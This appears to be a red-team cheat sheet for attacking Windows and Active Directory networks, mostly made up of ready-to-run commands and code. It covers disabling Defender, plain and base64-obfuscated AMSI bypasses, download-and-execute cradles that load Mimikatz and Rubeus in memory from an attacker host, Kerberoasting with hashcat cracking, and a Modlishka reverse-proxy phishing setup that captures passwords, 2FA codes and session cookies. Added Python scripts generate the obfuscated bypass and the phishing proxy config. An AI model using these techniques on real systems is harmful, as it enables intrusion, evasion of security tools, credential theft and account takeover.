
General

Oneliners

Disable Defender

# Needs an elevated PowerShell; silently fails when Tamper Protection is enabled
Set-MpPreference -DisableRealtimeMonitoring $true

Powershell AMSI Bypass

# Flips the private amsiInitFailed flag so this PowerShell process never calls AmsiScanBuffer again. The literal strings "AmsiUtils" and "amsiInitFailed" are what gets this plain form flagged, hence the obfuscated variant under Defense Evasion
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Recon

Host Scan

# NetDiscover (ARP Scanning):
- netdiscover -i eth0
- netdiscover -r 172.21.10.0/24

# Nmap:

- nmap -sn 172.21.10.0/24
- nmap -sn 172.21.10.1-253
- nmap -sn 172.21.10.*

# Nbtscan: 
- nbtscan -r 172.21.1.0/24

# Linux Ping Sweep (Bash)

- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

# Windows Ping Sweep (Run on Windows System in cmd.exe; -w is the reply timeout in ms, and inside a .bat file write %%i instead of %i)

- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.10.%i is up.

BloodHound

Download it from here

# Kali package: the collectors live in /usr/lib/bloodhound/resources/app/Collectors/
# From a local Windows host. runas /netonly uses the domain creds for network authentication only, so it works from a non-joined box; the password is not checked up front, a wrong one only shows up when collection fails
runas /netonly /user:domain\user cmd
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

Enumeration

Null Session

Initial Access

Kerberoasting

SPN Service Account

# Request a TGS for every user account that has an SPN (computer objects are excluded by the LDAP filter) and write the hashes to a file
GetUserSPNs.py domain/user:'password' -request -outputfile hashes.txt
# Crack the tickets: mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4). AES128/AES256 tickets (etype 17/18) need -m 19600 / 19700 instead
hashcat -a 0 -m 13100 hashes.txt wordlist.txt

Privilege Escalation

Lateral Movement

Defense Evasion

Bypass AMSI

Install the ISESteroids add-on manually by downloading the compressed ZIP file.

  • After installing the steroids tool, open PowerShell ISE and run the following command:
start-steroids
  • Create a new PS script and paste the plain AMSI bypass one-liner (the literal strings "AmsiUtils" and "amsiInitFailed" are what gets that one-liner flagged).
  • In the Tools menu, choose obfuscate code and run the obfuscator.
  • Example of the generated obfuscated script: each flagged string is rebuilt at run time from a UTF-16LE base64 blob, so the static text no longer contains it:
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
  • Save the generated script on the attacker machine, for example as amsi.txt, and serve it over HTTP.
  • On the target host, download the AMSI bypass script and load it in memory:
(New-Object System.Net.WebClient).DownloadString('http://ip/amsi.txt') | iex
  • With AMSI disabled in that PowerShell process, any further script can be downloaded and executed in memory the same way.

    Examples:

    • Mimikatz
    (New-Object System.Net.WebClient).DownloadString('http://ip/Invoke-Mimikatz.ps1') | iex
    Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' 
    
    • BloodHound
    (New-Object System.Net.WebClient).DownloadString('http://ip/Invoke-Sharphound.ps1') | iex
    Invoke-BloodHound -CollectionMethod all 
    
    • Rubeus (a .NET assembly: DownloadData returns the byte[] that Assembly.Load needs, and Main takes a string[], hence Split())
    (New-Object System.Net.WebClient).DownloadString('http://ip/amsi.txt') | IEX
    $data = (New-Object System.Net.WebClient).DownloadData('http://ip/rubeus.exe')
    $assem = [System.Reflection.Assembly]::Load($data)
    [Rubeus.Program]::Main("purge".Split())
    [Rubeus.Program]::Main("s4u /user:web$ /rc4:c54444 /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
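Added example, written in Python rather than PowerShell and not taken from this page or from ISESteroids. It reproduces the transformation the obfuscator applied to the plain one-liner from the Oneliners section (each flagged string becomes a UTF-16LE base64 blob decoded at run time), and, for the defensive side, shows a check that decodes FromBase64String literals so the same markers are found in both the plain and the obfuscated form. The marker list and the detector are this example's own assumptions, not a Defender signature.

```python
import base64
import re

# Strings commonly present in AMSI-bypass one-liners (assumed marker list, matched case-insensitively)
AMSI_MARKERS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsicontext")
# Base64 payloads handed to [Convert]::FromBase64String('...')
B64_LITERAL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def ps_unicode_b64(text):
    """Encode like [Text.Encoding]::Unicode (UTF-16LE) + [Convert]::ToBase64String."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def b64_string_expr(text):
    """PowerShell subexpression that rebuilds `text` from base64 at run time."""
    return ("$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('%s')))"
            % ps_unicode_b64(text))


def obfuscate_amsi_bypass():
    """Rebuild the page's obfuscated one-liner from the plain one: the type name,
    the field name and the binding flags are replaced by decode-at-runtime
    subexpressions, so none of the flagged strings appears literally."""
    return "[Ref].Assembly.GetType(%s).GetField(%s,%s).SetValue($null,$true)" % (
        b64_string_expr("System.Management.Automation.AmsiUtils"),
        b64_string_expr("amsiInitFailed"),
        b64_string_expr("NonPublic,Static"),
    )


def find_amsi_markers(script):
    """Detection side: report the markers present in a script, looking at the
    plain text and inside every FromBase64String('...') literal, decoded both
    as UTF-16LE (PowerShell's Unicode) and as UTF-8 since both are common."""
    candidates = [script]
    for blob in B64_LITERAL.findall(script):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        candidates.append(raw.decode("utf-16-le", errors="replace"))
        candidates.append(raw.decode("utf-8", errors="replace"))
    found = []
    for text in candidates:
        low = text.lower()
        for marker in AMSI_MARKERS:
            if marker in low and marker not in found:
                found.append(marker)
    return found


PLAIN_ONELINER = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                  ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")

if __name__ == "__main__":
    obfuscated = obfuscate_amsi_bypass()
    print(obfuscated)
    print("plain      ->", find_amsi_markers(PLAIN_ONELINER))
    print("obfuscated ->", find_amsi_markers(obfuscated))
```

The string-level encoding only defeats a signature on the static script text; AMSI itself still sees the decoded strings once they exist in memory, which is why the bypass has to run before any further script is loaded.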
    

Red Team

Phishing

# Sending mails through Linux 
swaks -to "$mail" -from "user@security.com" -body "example" -header "Subject: example" -server ip

Bypass 2FA

Modlishka is a reverse HTTP proxy used for phishing: the victim logs in to the real site through it, so the password, the 2FA code and the authenticated session cookie all pass through the proxy, and 2FA alone does not stop the account takeover.
Add an A record for the phishing domain (evil.com below) pointing at the proxy host.
Generate a private key and a CSR for the phishing domain, then have the CSR signed; the signed certificate is what goes into "cert" in the config:

openssl genrsa -out evil.com.key 4096
openssl req -new -key evil.com.key -out evil.com.csr -utf8 -batch -subj '/CN=evil.com'
Download Modlishka and create a config file. "cert" and "certKey" must be single-line JSON strings, so flatten each PEM file with awk '{printf "%s\\n", $0}' evil.com.key (and the same for the certificate) and paste the output in. "target" is the legitimate site being proxied; a.evil.com below is a lab placeholder.
{
  "proxyDomain": "evil.com",
  "listeningAddress": "ip",

  "target": "a.evil.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules":"",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": true,
  "log": "requests.log",
  "plugins": "all",
  "cert": "-----BEGIN CERTIFICATE-----\n<snip>\n-----END CERTIFICATE-----\n",
  "certKey": "-----BEGIN RSA PRIVATE KEY-----\n<snip>\n-----END RSA PRIVATE KEY-----\n",
  "certPool": ""
}
Run modlishka
./Modlishka -config modlishka.json
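Added example (Python, not Modlishka's own code): builds the config above from the PEM files with the json module, which performs the same flattening as the awk one-liner but escapes every character correctly, and checks that the two give identical text for ordinary PEM input. The PEM bodies are constructed placeholders, not real key material, and the listening address is an assumed value.

```python
import json


def pem_as_json_value(pem_text):
    """The PEM as Modlishka expects it in the config value: every line kept,
    each terminated by a newline, so the JSON encoder writes it as '\\n'."""
    lines = [line for line in pem_text.splitlines() if line.strip()]
    return "".join(line + "\n" for line in lines)


def json_escaped(pem_text):
    """The escaped text that lands between the quotes in the JSON file."""
    return json.dumps(pem_as_json_value(pem_text))[1:-1]


def awk_style(pem_text):
    """What awk '{printf "%s\\n", $0}' prints for the same file: a literal
    backslash followed by n after every line."""
    return "".join(line + "\\n" for line in pem_text.splitlines())


def build_config(proxy_domain, listen_ip, target, cert_pem, key_pem,
                 debug=True, disable_security=True):
    """Assemble the page's template config; debug and disableSecurity default
    to the page's (lab) values and should be False on a real engagement."""
    return {
        "proxyDomain": proxy_domain,
        "listeningAddress": listen_ip,
        "target": target,
        "targetResources": "",
        "targetRules": "",
        "terminateTriggers": "",
        "terminateRedirectUrl": "",
        "trackingCookie": "id",
        "trackingParam": "id",
        "jsRules": "",
        "forceHTTPS": False,
        "forceHTTP": False,
        "dynamicMode": False,
        "debug": debug,
        "logPostOnly": False,
        "disableSecurity": disable_security,
        "log": "requests.log",
        "plugins": "all",
        "cert": pem_as_json_value(cert_pem),
        "certKey": pem_as_json_value(key_pem),
        "certPool": "",
    }


def render_config(config):
    return json.dumps(config, indent=2)


def load_config(text):
    return json.loads(text)


# Constructed placeholder PEM bodies (not real certificate or key material)
FAKE_CERT = "-----BEGIN CERTIFICATE-----\nMIIBfakeCertLine1\nfakeCertLine2==\n-----END CERTIFICATE-----\n"
FAKE_KEY = "-----BEGIN RSA PRIVATE KEY-----\nMIIEfakeKeyLine1\nfakeKeyLine2==\n-----END RSA PRIVATE KEY-----\n"

if __name__ == "__main__":
    # 10.0.0.5 is an assumed listening address
    cfg = build_config("evil.com", "10.0.0.5", "a.evil.com", FAKE_CERT, FAKE_KEY)
    with open("modlishka.json", "w") as fh:
        fh.write(render_config(cfg))
    print(render_config(cfg))
```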